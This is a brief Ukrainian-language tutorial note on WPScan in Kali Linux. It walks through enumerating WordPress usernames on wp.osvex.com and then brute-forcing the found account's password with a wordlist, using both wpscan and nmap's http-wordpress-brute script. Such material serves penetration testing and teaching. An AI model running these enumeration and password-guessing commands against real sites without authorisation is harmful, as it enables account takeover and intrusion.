WPScan - Kali Linux

Шукаєм вразливості та імена користувачів:

wpscan --url wp.osvex.com --enumerate u

Знайшли користувача osvex. Підбор паролю через wpscan по словарю passwords.txt:

wpscan --url wp.osvex.com --passwords passwords.txt --usernames osvex

Підбір через nmap:

nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=password.txt,threads=6 wp.osvex.com